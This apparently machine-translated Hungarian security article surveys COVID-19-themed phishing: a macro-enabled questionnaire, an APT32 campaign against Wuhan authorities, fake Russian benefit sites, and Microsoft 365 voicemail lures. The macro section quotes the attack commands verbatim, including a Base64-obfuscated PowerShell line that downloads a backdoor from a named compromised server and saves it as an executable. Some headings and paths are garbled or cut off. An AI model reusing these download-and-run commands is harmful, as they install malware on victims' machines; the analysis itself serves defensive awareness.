A támadók továbbra is kihasználják a COVID-19 témát, és egyre több fenyegetést jelentenek a járvánnyal kapcsolatos minden iránt élénken érdeklődő felhasználók számára. BAN BEN
Emlékezz be
Szeretnél egy ingyenes COVID-19 tesztet?
A koronavírus-témájú adathalászat másik jelentős példája volt
A legtöbb felhasználót könnyű volt meggyőzni a makrók engedélyezéséről. Ehhez egy szokásos trükköt használtak: a kérdőív kitöltéséhez először engedélyezni kell a makrókat, ami azt jelenti, hogy le kell futtatni egy VBA-szkriptet.
Amint láthatja, a VBA-szkriptet kifejezetten a vírusirtókkal takarják.
A Windows rendelkezik egy várakozási funkcióval, ahol az alkalmazás megvárja a /T <másodperceket>, mielőtt elfogadná az alapértelmezett „Igen” választ. Esetünkben a szkript 65 másodpercet várt, mielőtt törölte az ideiglenes fájlokat:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Várakozás közben pedig letöltötték a kártevőket. Ehhez egy speciális PowerShell-szkriptet indítottak:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
A Base64 érték dekódolása után a PowerShell-szkript letölti a korábban feltört webszerveren található hátsó ajtót Németországból:
http://automatischer-staubsauger.com/feature/777777.png
és elmenti a következő néven:
C:UsersPublictmpdirfile1.exe
Mappa ‘C:UsersPublictmpdir’
törlődik a parancsot tartalmazó „tmps1.bat” fájl futtatásakor cmd /c mkdir ""C:UsersPublictmpdir"".
Célzott támadás a kormányhivatalok ellen
Ezenkívül a FireEye elemzői a közelmúltban egy célzott APT32 támadásról számoltak be, amelyet Vuhan kormányzati struktúrái, valamint a kínai veszélyhelyzet-kezelési minisztérium ellen irányoztak. Az egyik terjesztett RTF tartalmazott egy hivatkozást a New York Times című cikkére
Érdekes módon az észlelés időpontjában egyik vírusirtó sem észlelte ezt a példányt a Virustotal szerint.
Amikor a hivatalos weboldalak nem működnek
Az adathalász támadás legszembetűnőbb példája éppen a napokban történt Oroszországban. Ennek oka a régóta várt ellátás kijelölése volt a 3 és 16 év közötti gyermekek számára. Amikor 12. május 2020-én bejelentették a jelentkezések fogadásának kezdetét, milliók siettek az Állami Szolgálatok oldalára a várva várt segítségért, és semmivel sem rombolták le a portált, mint egy profi DDoS támadás. Amikor az elnök azt mondta, hogy „a kormányzati szolgálatok nem tudnak megbirkózni a jelentkezések áramlásával”, az emberek elkezdtek beszélni az interneten egy alternatív pályázatfogadási oldal indításáról.
A probléma az, hogy több webhely kezdett el egyszerre működni, és míg az egyik, az igazi a posobie16.gosuslugi.ru címen valóban elfogadja a jelentkezéseket,
A SearchInform munkatársai körülbelül 30 új csaló domaint találtak a .ru zónában. Az Infosecurity és a Softline Company április eleje óta több mint 70 hasonló hamis kormányzati szolgáltatási webhelyet követett nyomon. Alkotóik az ismert szimbólumokat manipulálják, és a gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie és így tovább szavak kombinációit is használják.
Hype és social engineering
Mindezek a példák csak megerősítik, hogy a támadók sikeresen bevételt szereznek a koronavírus témájával. Minél nagyobb a társadalmi feszültség és minél több a tisztázatlan kérdés, annál nagyobb az esélye a csalóknak, hogy fontos adatokat lopjanak el, az embereket arra kényszerítsék, hogy önmaguktól adjanak le pénzüket, vagy egyszerűen több számítógépet törjenek fel.
És tekintettel arra, hogy a járvány miatt a potenciálisan felkészületlen emberek tömegesen otthonról dolgozzanak, nemcsak a személyes, hanem a vállalati adatok is veszélyben vannak. Például a közelmúltban a Microsoft 365 (korábban Office 365) felhasználókat is adathalász támadás érte. Az emberek hatalmas „elmulasztott” hangüzeneteket kaptak levelek mellékleteként. A fájlok azonban valójában egy HTML-oldal volt, amelyre a támadás áldozatait küldték
Forrás: will.com